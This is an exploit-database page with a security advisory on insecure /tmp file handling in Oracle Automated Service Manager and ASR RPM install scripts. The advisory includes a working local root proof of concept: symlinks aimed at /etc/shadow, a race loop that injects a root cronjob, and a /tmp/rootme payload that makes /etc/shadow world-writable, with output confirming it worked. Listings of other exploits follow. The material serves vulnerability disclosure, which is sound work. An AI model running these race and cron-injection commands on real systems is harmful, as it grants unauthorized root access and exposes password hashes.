Menu

Search for hundreds of thousands of exploits

"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation"

Author

Exploit author

"Larry W. Cashdollar"

Platform

Exploit platform

linux

Release date

Exploit published date

2013-02-05

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
Oracle Automated Service Manager 1.3 local root during install

Larry W. Cashdollar
1/29/2013
@_larry0


SUNWsasm-1.3.1-20110815093723

https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534

From the README:
"Oracle Automated Service Manager 1.3.1

Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport. It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it."

Possible issues with files in /tmp.

root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp

##Read the contents of crontab into a tmp file /usr/bin/crontab -l > /tmp/crontab_edit echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |

echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable > /dev/null

        echo >> /tmp/crontab_edit
        echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit
        echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit

ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`

sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`

sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit /usr/bin/crontab /tmp/crontab_edit
## Finally remove the tmp file
rm -f /tmp/tmpVariable
rm -f /tmp/crontab_edit

tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'` /usr/bin/crontab -l > /tmp/asrtab.??
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`

sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`

sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
/usr/bin/crontab /tmp/asrtab.??
rm /tmp/asrtab.??
]!tmpD
root@dev-unix-sec01:~/test#
First try, File overwriting vulnerability

$ ln -s /etc/shadow /tmp/mytab-tmp.??
$ ln -s /etc/shadow /tmp/mytab.??

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
########################################### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ########################################### [100%]

Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.

Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration. 

[root@oracle-lnx-lab02 ~]# cat /etc/shadow
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

Ok, lets try to inject a cronjob and get root:

Malicious user does:

[meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
########################################### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ########################################## [100%]
[root@oracle-lnx-lab02 ~] crontab -l
* * * * * /tmp/rootme
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

/tmp/rootme is:

#!/bin/sh

chmod 666 /etc/shadow

after a minute:

[root@oracle-lnx-lab02 ~] ls -l /etc/shadow

-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow

[root@oracle-lnx-lab02 ~]

Faulty Code:

    319 /usr/bin/crontab -l > /tmp/mytab.??

    320 if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then

    321      echo "0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1" >> /tmp/mytab.??

    322     /usr/bin/crontab /tmp/mytab.??

    323 fi

    324 

    325 rm /tmp/mytab.??


SUNWswasr RPM post install /tmp race condition


From the documentation:

"Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered."

The post-install script for SUNWswasr RPM handles files in /tmp insecurely.

I suspect a race condition exists where these two files can be used to either clobber root owned files or inject malicious cronjobs into roots cron:

/tmp/tmpVariable
/tmp/crontab_edit

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWswasr-4.3.1-20130117131218.rpm Preparing... ########################################### [100%]

Copyright [2008,2012], Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Legal Notices and Terms of Use).

1:SUNWswasr ########################################### [100%]
Directory /var/opt/SUNWsasm/configuration/caseinfo created.
Directory /var/opt/SUNWsasm/configuration/supportfile created.
ASR Manager Auto Update functionality has been enabled by default.
Please ensure that ASR manager is registered with ASR backend to get the software updates.
Installation of SUNWswasr was successful.

Lets fireup fsnoop[1] and take a look:

[C] -rw-r--r-- 1 root root 0  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 100  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[C] -rw-r--r-- 1 root root 0  Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 2  Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 101  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 143  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 188  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[D] F /tmp/tmpVariable
[D] F /tmp/crontab_edit

Those look exploitable lets pick one.

I was able to inject my own cronjob in as root with the following simple PoC:

$ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done

[root@oracle-lnx-lab02 ~]# crontab -l
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1
* * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary, see exploit above.

##Cronjob entry for ASR Auto Rules Update
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh

The uninstall script is just as sloppy:

[C] F /tmp/asrtab.??
[U] F /tmp/asrtab.??
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[D] F /tmp/asrtab.??

did they mean to use $$ for process Pid?
References:


[1] fsnoop - /tmp directory file watching utility by vl4dz.  http://vladz.devzero.fr/fsnoop.php

http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm#BABHIHFF
http://vapid.dhs.org/advisories/Oracle_ASR_4.3.1-root-install.html
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-01-16 "Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit" webapps php "Larry W. Cashdollar"
2018-10-11 "jQuery-File-Upload 9.22.0 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2018-09-18 "WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting" webapps php "Larry W. Cashdollar"
2018-04-23 "Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-22 "Joomla! Component com_videogallerylite 1.0.9 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-16 "Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-16 "Joomla! Component Catalog 1.0.7 - SQL Injection" webapps php "Larry W. Cashdollar"
2015-12-30 "DeleGate 9.9.13 - Local Privilege Escalation" local linux "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Recent Backups 0.7 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-07-13 "WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-07-08 "WordPress Plugin Easy2Map 1.24 - SQL Injection" webapps php "Larry W. Cashdollar"
2015-07-08 "WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-06-12 "WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal" webapps php "Larry W. Cashdollar"
2015-06-12 "WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2015-04-02 "WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2015-04-02 "WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2014-11-10 "WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities" webapps php "Larry W. Cashdollar"
2013-07-09 "Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation" local linux_x86 "Larry W. Cashdollar"
2013-03-12 "RubyGems fastreader - 'entry_controller.rb' Remote Command Execution" remote multiple "Larry W. Cashdollar"
2013-02-05 "Oracle Automated Service Manager 1.3 - Installation Privilege Escalation" local linux "Larry W. Cashdollar"
2012-12-09 "Centrify Deployment Manager 2.1.0.283 - Local Privilege Escalation" local linux "Larry W. Cashdollar"
2010-03-24 "Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities" local solaris "Larry W. Cashdollar"
2003-07-01 "InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions" local linux "Larry W. Cashdollar"
2003-04-23 "SAP Database 7.3/7.4 - SDBINST Race Condition" local linux "Larry W. Cashdollar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected